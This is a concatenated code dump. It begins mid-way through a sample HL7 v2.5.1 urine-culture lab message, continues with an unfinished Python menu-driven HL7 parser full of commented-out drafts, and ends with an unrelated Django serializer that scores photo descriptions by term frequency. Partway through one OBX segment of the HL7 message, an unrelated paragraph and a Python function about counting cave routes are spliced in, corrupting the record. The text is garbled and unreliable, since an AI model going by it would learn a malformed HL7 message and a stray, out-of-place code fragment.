Hospital&29D0539273&CLIA~XxxXx1234^^^SSN&2.16.840.1.113883.4.1&ISO^SS||LastName^FirstName^MiddleName^^^^L||19791028|M||2106-3^White^CDCREC^309316^White/Caucasian^L^2.5.1|1248 Anywhere Street^^FALLON^NV^89406^USA^C||^PRN^PH^^^775^1234567|||||||||N^Not Hispanic or Latino^HL70189^152116557^Not Hispanic or Latino^L^2.5.1\nORC|RE|04295406G0k6G^QUEST^2.16.840.1.113883.3.165.5^ISO|LV130458S6G0k6G_395QAW^QUEST^2.16.840.1.113883.3.165.4^ISO||CM|||||||1861572679^WATSON^DAVID^^^^^^NPI&2.16.840.1.113883.4.6&ISO^L^^^NPI^^^^^^^^||^^^^^^|||||||DESERT VIEW HOSPITAL-CPU^D|360 S LOLA LN^^PAHRUMP^NV^89048-0884^USA^O|^WPN^PH^^1^775^7517852^^OFFICE CONTACT: BRYAN CURTIS|360 S LOLA LN^^PAHRUMP^NV^89048-0884\nOBR|1|04295406G0k6G^QUEST^2.16.840.1.113883.3.165.5^ISO|LV130458S6G0k6G_395QAW^QUEST^2.16.840.1.113883.3.165.4^ISO|^^^395^CULTURE, URINE, ROUTINE^L^^v unknown|||202209061012-0700|||||||||1861572679^WATSON^DAVID^^^^^^NPI&2.16.840.1.113883.4.6&ISO^L^^^NPI^^^^^^^^|^^^^^^|||||20220908143813-0700|||F||||||\nOBX|1|CE|43409-2^BACTERIA ISLT CULT^LN^75000300^ISOLATE 1:^L^^v unknown|1|409801009^Klebsiella pneumoniae (ESBL)^SCT^KPESBL^Klebsiella pneumoniae (ESBL)^L|||A^Abnormal (applies to non-numeric results)^HL70078^^^^2.7|||F|||202209061012-0700|29D0652720||||20220908143758-0700||||QUEST DIAGNOSTICS - LAS VEGAS^L^^^^CLIA&2.16.840.1.113883.4.7&ISO^XX^^^29D0652720|4230 BURNHAM AVE^^LAS VEGAS^NV^89119-5408^^L|^IOLE^ELIZABETH^D.^^^^^^^^^^^^^^^^^ MD\nNTE|1||KLEBSIELLA PNEUMONIAE (ESBL)\nNTE|2||GREATER THAN 100,000 CFU/ML OF\nNTE|3||ESBL RESULT: THE ORGANISM HAS BEEN CONFIRMED AS AN ESBL PRODUCER.\nOBX|2|NM|18906-8^CIPROFLOXACIN SUSC ISLT^LN^77002706^CIPROFLOXACIN^L^^v unknown|1|2|1^^L||R^Resistant. 
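The puzzle solution above enumerates cave routes with an explicit stack of partial paths. The part-one rule (a lowercase cave may appear at most once per route) condenses to the search below; assuming the edge list has no duplicates, each pushed route is a distinct one-step extension, so the is_route_in_stack duplicate check the original performs appears redundant and is likely what makes its part-two loop slow:

from collections import defaultdict

def count_paths(connections):
    graph = defaultdict(list)
    for a, b in connections:
        graph[a].append(b)
        graph[b].append(a)
    stack, paths = [["start"]], 0
    while stack:
        route = stack.pop()
        for nxt in graph[route[-1]]:
            if nxt == "end":
                paths += 1                      # a complete start->end route
            elif nxt.isupper() or nxt not in route:
                stack.append(route + [nxt])     # "start" is lowercase, so never re-entered
    return paths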
Indicates for microbiology susceptibilities only.^HL70078^^^^2.7|||F|||202209061012-0700|29D0652720||||20220908143758-0700||||QUEST DIAGNOSTICS - LAS VEGAS^L^^^^CLIA&2.16.840.1.113883.4.7&ISO^XX^^^29D0652720|4230 BURNHAM AVE^^LAS VEGAS^NV^89119-5408^^L|^IOLE^ELIZABETH^D.^^^^^^^^^^^^^^^^^ MD\nOBX|3|SN|18932-4^IMIPENEM SUSC ISLT^LN^77003906^IMIPENEM^L^^v unknown|1|<=^0.25|1^^L||S^Susceptible. Indicates for microbiology susceptibilities only.^HL70078^^^^2.7|||F|||202209061012-0700|29D0652720||||20220908143758-0700||||QUEST DIAGNOSTICS - LAS VEGAS^L^^^^CLIA&2.16.840.1.113883.4.7&ISO^XX^^^29D0652720|4230 BURNHAM AVE^^LAS VEGAS^NV^89119-5408^^L|^IOLE^ELIZABETH^D.^^^^^^^^^^^^^^^^^ MD\nOBX|4|ST|18878-9^CEFAZOLIN SUSC ISLT^LN^77000906^CEFAZOLIN^L^^v unknown|1|>=64,E127|||R^Resistant. Indicates for microbiology susceptibilities only.^HL70078^^^^2.7|||F|||202209061012-0700|29D0652720||||20220908143758-0700||||QUEST DIAGNOSTICS - LAS VEGAS^L^^^^CLIA&2.16.840.1.113883.4.7&ISO^XX^^^29D0652720|4230 BURNHAM AVE^^LAS VEGAS^NV^89119-5408^^L|^IOLE^ELIZABETH^D.^^^^^^^^^^^^^^^^^ MD\nSPM|1|04295406G0k6G&QUEST&2.16.840.1.113883.3.165.5&ISO^LV130458S6G0k6G&QUEST&2.16.840.1.113883.3.165.4&ISO||122575003^Urine specimen (specimen)^SCT^UR^Urine^HL70487^2.5.1^V UNKNOWN^URINE|||||||||||||202209061012-0700|20220906175300-0700\n\"\"\"\n\n# This part splits the entire HL7 v2.5.1 message assigned to the variable \"hl7\" into segments that are separated by the \"\\n\" character. \nhl7_split = hl7.split(\"\\n\")\n\n\"\"\"\nThe \"___()\" function:\n 1. Takes ___ argument, which is the result of the \"___\" function.\n 2. Creates a new ___ assigned to the variable \"___\".\n 3. Iterates through the new ___ using a \"for\" loop, checking for the \"___\" variable.\n 4. Defines the \"___\" variable as the index of the items in the new ___, and assigns this to the variable \"___\"\n 5. Returns the entire new ___ as a ___ split up into each field of the segment of the original HL7 v2.5.1 message.\n\"\"\"\n\"\"\"\ndef validate_input(menu, menu_prompt):\n print(*menu, sep=\"\\n\")\n menu_selection = int(input(menu_prompt))\n #while 0 > menu_selection < (len(menu()) - 1):\n while 0 <= menu_selection <= (len(menu()) - 1):\n #while True:\n #try:\n # menu_selection = int(input(menu_prompt))\n #except ValueError:\n print(\"You must enter a number that corresponds with the menu option you'd like to select.\" + \"\\n\" + \"Please enter a valid menu number: \")\n #continue\n else:\n return menu[menu_selection]\n \n #break\n #else:\n #print(\"else in first while loop\")\n\"\"\"\n\n\n# The \"menu()\" function:\n# 1. Creates a new list assigned to the variable \"main_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"main_menu\" list, with each menu option on a new line.\ndef menu():\n main_menu = [\n \"[1] View Entire HL7 Message\",\n \"[2] Message Header\",\n \"[3] Patient Identification\",\n \"[4] Lab Order Information\",\n \"[5] Lab Result Information\",\n \"[6] Specimen Information\",\n \"[0] Exit\"]\n print(\"HL7 PARSER MAIN MENU\")\n print(*main_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 1: View Entire HL7 Message (There is no pre-defined function for this option. The code is within a \"while\" statement later in the program.)\n# Choosing Option \"1\" from the Main Menu will display the entire HL7 Message, then display the Main Menu again and prompt the user to make another selection.\n\n# MAIN MENU OPTION 2: Message Header\n# The \"menu_Message_Header()\" function:\n# 1. 
Creates a new list assigned to the variable \"message_header_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"message_header_menu\" list, with each menu option on a new line.\ndef menu_Message_Header():\n message_header_menu = [\n \"[1] View Entire Message Header Segment\",\n \"[2] Sending Facility\",\n \"[3] Receiving Facility\",\n \"[4] Message Type Information\",\n \"[5] HL7 Message Version\",\n \"[0] Back to Main Menu\"]\n print(\"MESSAGE HEADER MENU\")\n print(*message_header_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 3: Patient Identification\n# The \"menu_Patient_Identification()\" function:\n# 1. Creates a new list assigned to the variable \"patient_identification_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"patient_identification_menu\" list, with each menu option on a new line.\ndef menu_Patient_Identification():\n patient_identification_menu = [\n \"[1] View Entire Patient Identification Segment\",\n \"[2] Patient Name\",\n \"[3] Patient Date of Birth\",\n \"[4] Patient Address\",\n \"[5] Patient Phone Number\",\n \"[0] Back to Main Menu\"]\n print(\"PATIENT IDENTIFICATION MENU\")\n print(*patient_identification_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 4: Lab Order Information\n# The \"menu_Lab_Order()\" function:\n# 1. Creates a new list assigned to the variable \"lab_order_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"lab_order_menu\" list, with each menu option on a new line.\ndef menu_Lab_Order():\n lab_order_menu = [\n \"[1] View All Lab Order Segments\",\n \"[2] Ordering Facility Information\",\n \"[3] Ordering Provider Information\",\n \"[4] Lab Order Information\",\n \"[0] Back to Main Menu\"]\n print(\"LAB ORDER INFORMATION MENU\")\n print(*lab_order_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 5: Lab Result Information\n# The \"menu_Lab_Result()\" function:\n# 1. Creates a new list assigned to the variable \"lab_result_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"lab_result_menu\" list, with each menu option on a new line.\ndef menu_Lab_Result():\n lab_result_menu = [\n \"[1] View All Lab Result Segments\",\n \"[2] Lab Results\",\n \"[0] Back to Main Menu\"]\n print(\"LAB RESULT INFORMATION MENU\")\n print(*lab_result_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 6: Specimen Information\n# The \"menu_Specimen()\" function:\n# 1. Creates a new list assigned to the variable \"specimen_menu\" containing each menu option as an item in the list.\n# 2. Prints the entire \"specimen_menu\" list, with each menu option on a new line.\ndef menu_Specimen():\n specimen_menu = [\n \"[1] View Entire Specimen Segment\",\n \"[2] Specimen Information\",\n \"[0] Back to Main Menu\"]\n print(\"SPECIMEN INFORMATION MENU\")\n print(*specimen_menu, sep=\"\\n\")\n\n# MAIN MENU OPTION 0: Exit (There is no pre-defined function for this option. The code is within a \"while\" statement later in the program.)\n# Choosing Option \"0\" from the Main Menu will exit the HL7 Parser Program.\n\n\"\"\"\nFUNCTION TO RETURN ALL DATA WITHIN SPECIFIED HL7 SEGMENT(S)\nThe \"segment(hl7_split, header)\" function:\n 1. Takes two arguments:\n - \"hl7_split\" is the original HL7 Message, split into segments, using the \"\\n\" character as a delimiter.\n - \"header\" is a three character string that corresponds to the three character header of the segment(s) being used from the HL7 message .\n 2. Creates a new dictionary and assigns it to the variable \"newdict\".\n 3. 
Iterates through the HL7 Message segment(s) identified by the \"hl7_split\" variable using a \"for\" loop, checking for the \"segment\" variable.\n 4. Assigns the \"key\" for \"newdict\" to the first three characters of the selected HL7 message segment(s), which is the segment header.\n 5. Assigns the \"value\" for \"newdict\" to the characters from position three through the rest of the string in the selected HL7 message segment(s).\n 6. Uses a conditional \"if\" statement to ensure all occurances of a segment header (key), and the segment containing the header(s) (value)\n are included in a new list called \"newdict[key]\", by checking if they are in the list as the function iterates through the HL7 message.\n This part of the function also appends one or multiple segments to the newly created list.\n 7. Returns all occurences of segment(s) (value) paired with the segment header (key) in the new list (newdict[key]) as a string, based on the arguments passed into the function.\n 8. This function's arguments are designed to include the entire \"segment\" when returning the result. The \"header\" is re-attached when returning the result.\n\"\"\"\ndef segment(hl7_split, header):\n newdict = {}\n for segment in hl7_split:\n key = segment[0:3]\n value = segment[3:]\n\n if key not in newdict:\n newdict[key] = []\n newdict[key].append(value)\n \n else:\n newdict[key].append(value)\n\n return header + newdict[header][0]\n\n\"\"\"\nFUNCTION TO RETURN DATA WITHIN A SPECIFIED FIELD WITHIN SPECIFIED HL7 SEGMENT(S)\nThe \"field(hl7_split, header, field)\" function:\n 1. Takes three arguments:\n - \"hl7_split\" is the original HL7 Message, split into segments, using the \"\\n\" character as a delimiter.\n - \"header\" is a three character string that corresponds to the three character header of the segment(s) being used from the HL7 message .\n - \"field\" is a list of items within the segment(s) from the original HL7 Message, split into fields, using the \"^\" character as a delimiter.\n 2. Uses a conditional \"if\" statement to ensure that if the \"MSH\" or \"Message Header\" segment is selected using the function,\n the number passed to the \"field\" argument reflects the actual number convention for HL7 messages.\n 3. Creates a new dictionary and assigns it to the variable \"newdict\".\n 4. Iterates through the HL7 Message segment(s) identified by the \"hl7_split\" variable using a \"for\" loop, checking for the \"segment\" variable.\n 5. Assigns the \"key\" for \"newdict\" to the first three characters of the selected HL7 message segment(s), which is the segment header.\n 6. Assigns the \"value\" for \"newdict\" to the characters from position three through the rest of the string in the selected HL7 message segment(s).\n 7. Uses another conditional \"if\" statement to ensure all occurances of a segment header (key), and the segment containing the header(s) (value)\n are included in a new list called \"newdict[key]\", by checking if they are in the list as the function iterates through the HL7 message.\n This part of the function also further splits the segments by \"|\" and \"^\" delimiters whether one or multiple segments are appended to the newly created list.\n 8. Returns only the pieces of the new list (newdict[key]) as a string, based on the arguments passed into the function.\n 9. 
This function's arguments are designed to drilldown only to the \"field\" level when returning the result.\n\"\"\"\ndef field(hl7_split, header, field):\n if header == \"MSH\":\n field = field - 2\n else:\n field = field - 1\n \n newdict = {}\n for segment in hl7_split:\n key = segment[0:3]\n value = segment[3:]\n\n if key not in newdict:\n newdict[key] = []\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:])\n \n else:\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:])\n\n return \"\".join(newdict[header][0][field])\n\n\"\"\"\nThe \"field(hl7_split, header, field)\" function:\n 1. Takes three arguments:\n - \"hl7_split\" is the original HL7 Message, split into segments, using the \"\\n\" character as a delimiter.\n - \"header\" is a three character string that corresponds to the three character header of the segment(s) being used from the HL7 message .\n - \"field\" is a list of items within the segment(s) from the original HL7 Message, split into fields, using the \"^\" character as a delimiter.\n 2. Uses a conditional \"if\" statement to ensure that if the \"MSH\" or \"Message Header\" segment is selected using the function,\n the number passed to the \"field\" argument reflects the actual number convention for HL7 messages.\n 3. Creates a new dictionary and assigns it to the variable \"newdict\".\n 4. Iterates through the HL7 Message segment(s) identified by the \"hl7_split\" variable using a \"for\" loop, checking for the \"segment\" variable.\n 5. Assigns the \"key\" for \"newdict\" to the first three characters of the selected HL7 message segment(s), which is the segment header.\n 6. Assigns the \"value\" for \"newdict\" to the characters from position three through the rest of the string in the selected HL7 message segment(s).\n 7. Uses another conditional \"if\" statement to ensure all occurances of a segment header (key), and the segment containing the header(s) (value)\n are included in a new list called \"newdict[key]\", by checking if they are in the list as the function iterates through the HL7 message.\n This part of the function also further splits the segments by \"|\" and \"^\" delimiters whether one or multiple segments are appended to the newly created list.\n 8. Returns only the pieces of the new list (newdict[key]), based on the arguments passed into the function.\n 9. This function's arguments are designed to drilldown all the way to the \"field_separator\" level when returning the result.\n\"\"\"\ndef field_separator(hl7_split, header, field, field_separator):\n if header == \"MSH\":\n field = field - 2\n else:\n field = field - 1\n \n newdict = {}\n for segment in hl7_split:\n key = segment[0:3]\n value = segment[3:]\n \n if key not in newdict:\n newdict[key] = []\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:]) \n else:\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:])\n\n return newdict[header][0][field][field_separator - 1]\n\n\"\"\"\nBeginning of HL7 Application...\n\"\"\"\ntry:\n # DISPLAY MAIN MENU\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n #print(len(menu()) - 1)\n #option_Menu = validate_input(menu(), \"Enter a number for the message section you would like to view: \")\nexcept:\n # DISPLAY MAIN MENU AFTER INVALID NUMBER ENTERED\n print(\"\\n\" + \"Invalid option! 
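The segment, field and field_separator helpers above all reduce to two splits: "|" separates fields within a segment and "^" separates components within a field, with MSH shifted by one index because its first field is the separator character itself. A condensed version of that indexing, using conventional 1-based HL7 numbering:

def hl7_field(hl7_text, header, n):
    # Return field n (1-based) of the first segment with this 3-letter header.
    for segment in hl7_text.split("\n"):
        if segment.startswith(header):
            fields = segment.split("|")
            # In MSH the "|" itself counts as MSH-1, so MSH-n sits one
            # index earlier than the same field number in other segments.
            return fields[n - 1 if header == "MSH" else n]
    return None

def hl7_component(field_value, c):
    # Components inside a field are "^"-separated; c is 1-based.
    return field_value.split("^")[c - 1]

# e.g. hl7_component(hl7_field(hl7, "MSH", 9), 1) -> "ORU" (the message code)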
You must enter a number between 1 and 6...\" + \"\\n\")\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n\"\"\"\nMain Menu of HL7 Application...\n\"\"\"\n# Entering \"0\" breaks out of the while loop, prints: \"You have exited the HL7 Program.\" and then exits the program.\nwhile option_Menu != 0: \n if option_Menu == 1:\n # DISPLAY ENTIRE HL7 MESSAGE\n print(\"\\n\" + \"Entire HL7 Message: \" + \"\\n\" + hl7)\n\n # DISPLAY MAIN MENU AFTER DISPLAYING ENTIRE HL7 MESSAGE \n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n elif option_Menu == 2:\n # DISPLAY MESSAGE HEADER MENU\n print() # Added for one line of space between menus...\n menu_Message_Header()\n option_Message_Header = int(input(\"Enter a number for the Message Header information you would like to view: \"))\n\n # Entering \"0\" breaks out of the while loop, prints the main menu options, then prompts the user to select an option from the main menu.\n while option_Message_Header != 0:\n if option_Message_Header == 1:\n print(\"\\n\" + \"Entire Message Header Segment (MSH): \" + \"\\n\" + str(segment(hl7_split, \"MSH\")) + \"\\n\")\n elif option_Message_Header == 2:\n print(\"\\n\" + \"Sending Facility: \" + str(field_separator(hl7_split, \"MSH\", 4, 1)) + \"\\n\")\n elif option_Message_Header == 3:\n print(\"\\n\" + \"Receiving Facility: \" + str(field_separator(hl7_split, \"MSH\", 6, 1)) + \"\\n\")\n elif option_Message_Header == 4:\n print(\"\\n\" + \"Message Type Information: \" + (str(field_separator(hl7_split, \"MSH\", 9, 3)) + \" (Message Structure)\").rjust(15) + \"\\n\" + (str(field_separator(hl7_split, \"MSH\", 9, 1)) + \" (Message Code)\").rjust(48) + \"\\n\" + (str(field_separator(hl7_split, \"MSH\", 9, 2)) + \" (Trigger Event)\").rjust(49) + \"\\n\")\n elif option_Message_Header == 5:\n print(\"\\n\" + \"Message Version: \" + \"HL7 v\" + str(field(hl7_split, \"MSH\", 12)) + \"\\n\")\n else:\n print(\"\\n\" + \"Please enter a valid option.\")\n\n # DISPLAY MESSAGE HEADER MENU AFTER RESULT OF LAST MENU SELECTION\n menu_Message_Header()\n option_Message_Header = int(input(\"Enter a number for the corresponding Message Header information: \"))\n else:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n print() # Added for one line of space between menus...\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n elif option_Menu == 3:\n # DISPLAY PATIENT IDENTIFICATION MENU\n print() # Added for one line of space between menus...\n menu_Patient_Identification()\n option_Patient_Identification = int(input(\"Enter a number for the Patient Identification information you would like to view: \"))\n \n # Entering \"0\" breaks out of the while loop, prints the main menu options, then prompts the user to select an option from the main menu.\n while option_Patient_Identification != 0:\n if option_Patient_Identification == 1:\n print(\"\\n\" + \"Entire Patient Identification Segment (PID): \" + \"\\n\" + str(segment(hl7_split, \"PID\")) + \"\\n\")\n elif option_Patient_Identification == 2:\n print(\"\\n\" + \"2\" + \"\\n\")\n elif option_Patient_Identification == 3:\n print(\"\\n\" + \"3\" + \"\\n\")\n elif option_Patient_Identification == 4:\n print(\"\\n\" + \"4\" + \"\\n\")\n elif option_Patient_Identification == 5:\n print(\"\\n\" + \"5\" + \"\\n\")\n else:\n print(\"\\n\" + \"Please enter a valid option.\")\n\n # DISPLAY PATIENT 
IDENTIFICATION MENU AFTER RESULT OF LAST MENU SELECTION\n menu_Patient_Identification()\n option_Patient_Identification = int(input(\"Enter a number for the corresponding Patient Identification information: \"))\n else:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n print() # Added for one line of space between menus...\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n elif option_Menu == 4:\n # DISPLAY LAB ORDER MENU\n print() # Added for one line of space between menus...\n menu_Lab_Order()\n option_Lab_Order = int(input(\"Enter a number for the Lab Order information you would like to view: \"))\n \n # Entering \"0\" breaks out of the while loop, prints the main menu options, then prompts the user to select an option from the main menu.\n while option_Lab_Order != 0:\n if option_Lab_Order == 1:\n print(\"\\n\" + \"Entire Common Order Segment (ORC): \" + \"\\n\" + str(segment(hl7_split, \"ORC\")))\n print(\"\\n\" + \"Entire Observation Request Segment (OBR): \" + \"\\n\" + str(segment(hl7_split, \"OBR\")) + \"\\n\")\n elif option_Lab_Order == 2:\n print(\"\\n\" + \"2\" + \"\\n\")\n elif option_Lab_Order == 3:\n print(\"\\n\" + \"3\" + \"\\n\")\n elif option_Lab_Order == 4:\n print(\"\\n\" + \"4\" + \"\\n\")\n else:\n print(\"\\n\" + \"Please enter a valid option.\")\n\n # DISPLAY LAB ORDER MENU AFTER RESULT OF LAST MENU SELECTION\n menu_Lab_Order()\n option_Lab_Order = int(input(\"Enter a number for the corresponding Lab Order information: \"))\n else:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n print() # Added for one line of space between menus...\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n elif option_Menu == 5:\n # DISPLAY LAB RESULT MENU\n print() # Added for one line of space between menus...\n menu_Lab_Result()\n option_Lab_Result = int(input(\"Enter a number for the Lab Result information you would like to view: \"))\n \n # Entering \"0\" breaks out of the while loop, prints the main menu options, then prompts the user to select an option from the main menu.\n while option_Lab_Result != 0:\n if option_Lab_Result == 1:\n print(\"\\n\" + \"1\" + \"\\n\")\n #print(\"\\n\" + \"Entire Observation/Result Segment (OBX) - All Occurences: \" + \"\\n\" + str(segment(hl7_split, \"OBX\")) + \"\\n\")\n #print(\"\\n\" + \"Entire Observation/Result Segment (OBX) - All Occurences: \" + \"\\n\" + + \"\\n\")\n #print(\"\\n\" + \"Entire Observation/Result Segment (OBX) - All Occurences: \" + \"\\n\" + re.findall(str(segment(hl7_split, \"OBX\")), str(hl7_split)) + \"\\n\")\n #print(\"\\n\" + \"Entire Observation/Result Segment (OBX) - All Occurences: \")\n #print(segment(hl7_split, \"OBX\")[0:3])\n #print(hl7_split[0:3])\n #print(str(hl7_split.count(\"OBX\")))\n #print(len(re.findall(\"OBX\", str(hl7_split))))\n #for \"OBX\" in range(len(hl7_split)):\n #print(hl7_split[\"OBX\"])\n elif option_Lab_Result == 2:\n print(\"\\n\" + \"2\" + \"\\n\")\n else:\n print(\"\\n\" + \"Please enter a valid option.\")\n\n # DISPLAY LAB RESULT MENU AFTER RESULT OF LAST MENU SELECTION\n menu_Lab_Result()\n option_Lab_Result = int(input(\"Enter a number for the corresponding Lab Result information: \"))\n else:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n print() # Added for one line of space between menus...\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would 
like to view: \"))\n\n elif option_Menu == 6:\n # DISPLAY SPECIMEN MENU\n print() # Added for one line of space between menus...\n menu_Specimen()\n option_Specimen = int(input(\"Enter a number for the Specimen information you would like to view: \"))\n \n # Entering \"0\" breaks out of the while loop, prints the main menu options, then prompts the user to select an option from the main menu.\n while option_Specimen != 0:\n if option_Specimen == 1:\n print(\"\\n\" + \"Entire Specimen Segment (SPM): \" + \"\\n\" + str(segment(hl7_split, \"SPM\")) + \"\\n\")\n elif option_Specimen == 2:\n print(\"\\n\" + \"2\" + \"\\n\")\n elif option_Specimen == 3:\n print(\"\\n\" + \"3\" + \"\\n\")\n elif option_Specimen == 4:\n print(\"\\n\" + \"4\" + \"\\n\")\n elif option_Specimen == 5:\n print(\"\\n\" + \"5\" + \"\\n\")\n else:\n print(\"\\n\" + \"Please enter a valid option.\")\n\n # DISPLAY SPECIMEN MENU AFTER RESULT OF LAST MENU SELECTION\n menu_Specimen()\n option_Specimen = int(input(\"Enter a number for the corresponding Specimen information: \"))\n else:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n print() # Added for one line of space between menus...\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n else:\n # DISPLAY MAIN MENU AFTER INVALID NUMBER ENTERED\n print(\"\\n\" + \"Invalid option! You must enter a number between 1 and 6...\" + \"\\n\")\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \")) \nelse:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n# DISPLAY MESSAGE TO NOTIFY USER THEY HAVE EXITED THE HL7 PARSER AFTER OPTION \"0\" SELECTED IN MAIN MENU \nprint(\"You have exited the HL7 Program.\")\n\n\"\"\"\nThe \"hl7_segments(hl7_split)\" function:\n 1. Takes one argument, which is the variable \"hl7_split\".\n 2. Creates a new dictionary assigned to the variable \"hl7_dictionary\".\n 3. Iterates through the new dictionary using a \"for\" loop, checking for the \"segment\" variable.\n 4. Defines the \"segment\" variable as the index of the items in the new dictionary, and assigns this to the variable \"segment_split\"\n 5. 
Returns the entire new dictionary as a list split up into each segment of the original HL7 v2.5.1 message.\n\"\"\"\n\"\"\"\ndef hl7_segments(hl7_split):\n hl7_dictionary = dict(hl7 = hl7_split)\n for segment in hl7_dictionary:\n segment_split = hl7_dictionary[segment]\n \n #print(segment_split)\n #return segment_split\n print(hl7_dictionary)\n\n# Assigns a variable \"x\" to call the hl7_segments(hl7_split) function.\nhl7_segments(hl7_split)\n\"\"\"\n\"\"\"\ndef segment(hl7_split):\n newdict = {}\n for line in hl7_split:\n if line[0:3] not in newdict:\n newdict[line[0:3]] = []\n newdict[line[0:3]].append(line[3:])\n else:\n newdict[line[0:3]].append(line[3:])\n \n #pprint.pprint(newdict)\n pprint.pprint(newdict)\n\nsegment(hl7_split)\n\ndef segment(hl7_split):\n newdict = {}\n for segment in hl7_split:\n key = segment[0:3]\n value = segment[3:]\n\n if key not in newdict:\n newdict[key] = []\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:])\n \n else:\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:])\n\n #print(newdict[\"MSH\"][0][2][0])\n return newdict[\"MSH\"][0][2][0]\n\"\"\"\n\n\"\"\"\nThe \"hl7_fields(hl7_segments(hl7_split))\" function:\n 1. Takes one argument, which is the result of the \"hl7_segments(hl7_split)\" function.\n 2. Creates a new list assigned to the variable \"segment_list\".\n 3. Iterates through the new list using a \"for\" loop, checking for the \"field\" variable.\n 4. Defines the \"field\" variable as the index of the items in the new list, and assigns this to the variable \"field_split\"\n 5. Returns the entire new list as a list split up into each field of the segment of the original HL7 v2.5.1 message.\n\"\"\"\n\"\"\"\ndef hl7_fields(x):\n x_split = x.split(\"|\")\n segment_list = list(x_split)\n for field in segment_list:\n field_split = segment_list[field]\n \n print(field_split)\n #return field_split\n\n# Call the hl7_fields(hl7_segments(hl7_split)) function.\nhl7_fields(x)\n\"\"\"\n\"\"\"\nsegment_split = hl7.split(\"\\n\")\n\nhl7_dictionary = dict(hl7 = hl7_split)\nfor segment in hl7_dictionary:\n segment_split = hl7_dictionary[segment]\n# convert to \"return\" instead of \"print\"\nprint(segment_split)\n\n\nmsh = hl7_split[0]\n#pid = hl7_split[1]\n\nmsh_split = msh.split(\"|\")\nfield = msh_split[3]\n\nfield_split = field.split(\"^\")\ntarget = field_split[0]\n\n#print(field)\n#print(field_split)\n\n#newdict = dict(hl7 = msh_split)\n#print(newdict)\n\n#newdict = dict(msh = msh_split)\n#print(newdict)\n\n#newdict = dict(field = field_split)\n#print(newdict)\n\n#print(target)\n#print(*msh_split, sep=\"\\n\")\n\"\"\"\n\"\"\"\n#, sep=\"\\n\" + \"\\n\"\nfor x in hl7_split:\n hl7_split[x] = segment\n \nsegment_split = segment.split(\"|\")\n\n#print(*hl7_split, sep=\"\\n\")\n#print(*pid.split(\"|\"), sep=\"\\n\")\n#print(*pid.split(\"|\"), sep=\"\\n\")\n\n# print(testing.index(\"MSH\"))\n# print(testing.index(\"PID\"))\n# print(testing.index(\"SPM\"))\n\n# for y in testing:\n# y = testing.index(\"\\n\")\n# print(y)\n\"\"\"","repo_name":"jarrettsmo/INF360VA_Midterm_HL7Parser_JarrettSmolarkiewicz","sub_path":"extraCode.py","file_name":"extraCode.py","file_ext":"py","file_size_in_byte":30088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70813855561","text":"from rest_framework import serializers\nfrom photo_statistic.models import PhotoStatistic\nfrom photo.models import Photo\nfrom user.models import User\nfrom photo.serializer import 
PhotoSerializer\nfrom nltk import tokenize\nfrom operator import itemgetter\nimport math\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize\n\nclass PhotoStatisticSerializer(serializers.ModelSerializer):\n statistic = serializers.SerializerMethodField()\n # photo_description = serializers.SerializerMethodField()\n\n class Meta:\n model = PhotoStatistic\n fields = '__all__' \n\n def get_statistic(self, statistic):\n item = statistic.photo.__dict__\n item_statistic = statistic.__dict__\n import pprint\n pp = pprint.PrettyPrinter(indent=4)\n \n stop_words = set(stopwords.words('portuguese'))\n stop_words_english = set(stopwords.words('english'))\n words = item['photo_description']\n if not len(words):\n user = User.objects.filter(user_id=item['user_id'])\n values = [ x for x in user.values('description') ]\n if values[0]['description']:\n words = values[0]['description']\n else:\n words = ''\n print(item['user_id'],\"------------\",values[0])\n \n \n\n time = item_statistic['photo_statistic_time']\n\n total_words = words.split()\n total_word_length = len(total_words)\n total_sentences = tokenize.sent_tokenize(words)\n total_sent_len = len(total_sentences)\n \n tf_score = {}\n for each_word in total_words:\n each_word = each_word.replace('.','')\n if each_word not in stop_words and each_word not in stop_words_english:\n if len(each_word) > 2:\n if each_word in tf_score:\n tf_score[each_word] += 1\n else:\n tf_score[each_word] = 1\n \n tf_score.update((x, y/int(total_word_length) + time) for x, y in tf_score.items())\n # photos = Photo.objects.all()\n \n return tf_score\n 